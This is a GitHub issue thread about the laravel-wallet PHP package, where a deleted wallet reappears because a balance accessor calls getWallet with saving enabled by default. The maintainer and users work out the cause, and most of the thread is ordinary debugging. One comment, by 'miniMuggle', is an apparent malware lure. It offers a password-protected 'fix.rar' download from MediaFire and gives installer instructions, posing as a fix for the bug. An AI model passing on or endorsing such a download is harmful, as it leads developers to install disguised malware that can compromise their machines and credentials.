### ISSUE TITLE
How to disable auto create wallet behavior ?

### ISSUE THREAD

**Issue by ISNewton** [bavix/laravel-wallet#990]
**Describe your task**
I have a delete user wallet method : 
```
    public function delete(Request $request, User $supervisor)
    {
        $wallet = $supervisor->getWallet(User::getSupervisorWalletKey($request->institution->id));


        if ($wallet) {
            $wallet->delete();
        }

        return apiSuccess();
    }

```

It just deletes the user wallet by slug (not the default).

After the deletion succeed (I checked the db and the wallet is gone), when I query all users with their wallets , I get the same wallet I deleted before . 
```
    public function index(Request $request)
    {
        $supervisors = User::query()
            ->select('id', 'name')
            ->with(['wallets' => function ($query) {
                $query->select('id', 'slug', 'uuid', 'holder_id', 'holder_type', 'balance', 'meta');
            }])
            ->whereHas('roles', function ($query) {
                $query->whereIn('system_roles.id', collect(SYSTEM_ROLES)->only('institution_manager')->toArray());
            })
            ->whereHas('wallets', function (Builder $query) use ($request) {
                $query->where('slug', User::getSupervisorWalletKey($request->institution->id));
            })
            ->get();

        return apiSuccess(ManagerPointsResource::collection($supervisors));
    }

```

**Expected behavior**
I don't want the wallet to be auto created

**Server:**
    php version: 8.3
    database: mysql 8.0
    wallet version 7.3.6

**Additional context**

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ISNewton** [comment]
Thanks @rez1dent3 .

**Comment by usmanjdn7** [comment]
@rez1dent3  that same issue happend on balance when i call `auth()->user()->balanceFloatNum` its happend very rearly. i double check the request logs and request came once at a time.

**Comment by rez1dent3** [comment]
@usmanjdn7 Hello. This means you are saving or performing some actions on the wallet. Starting with 10.x, this problem cannot happen, since the wallet is not created.

**Comment by usmanjdn7** [comment]
@rez1dent3  only call to get wallet balance, deposit and withdraw Api's are disabled. 
<img width="391" alt="image" src="https://github.com/user-attachments/assets/0fb9f466-05fc-4bfd-a524-07b166d1cc59">

**Comment by rez1dent3** [comment]
@usmanjdn7 I double checked. Everything works correctly, the wallet is not saved.
https://github.com/bavix/laravel-wallet/blob/2a7f315eb13a069228d24366a62e5605931c5524/tests/Units/Domain/BalanceTest.php#L174-L183

Please make a demo project with the problem. I will tell you what went wrong.

**Comment by usmanjdn7** [comment]
i can't at the moment... below is the error report
<img width="623" alt="image" src="https://github.com/user-attachments/assets/9cd90839-bed3-421b-9db2-3f4273fb7121">

**Comment by rez1dent3** [comment]
@usmanjdn7 I have provided a test above that runs successfully on sqlite, mysql, postgres. The wallet is not created on laravel-wallet versions 10.0+.

On versions <10.0, your error will be exactly that. Perhaps you have redefined some of the package services and even after the update you may have this problem, but I can't help you here.

Unfortunately, I can't reproduce your problem. I need details.

**Comment by usmanjdn7** [comment]
hi @rez1dent3  i just dig into the `balanceFloatNum` code, in `getBalanceFloatAttribute` accessor you call the `getWallet` without giving the `$save` bool which create the wallet because the default value is set to true. see the below screenshots.

<img width="650" alt="Screenshot 2024-09-10 121124" src="https://github.com/user-attachments/assets/265843ba-f5f2-48a1-8b55-e01d6dd7941c">

![Screenshot 2024-09-10 121212](https://github.com/user-attachments/assets/6be77a54-b2d3-4637-93db-66cca3664cf2)

**Comment by rez1dent3** [comment]
@usmanjdn7 You're right. I'll check and fix it. It's strange that the tests pass. I need to fix the tests.

**Comment by usmanjdn7** [comment]
@rez1dent3  Many thanks to you for such good. :smiling_face_with_three_hearts:
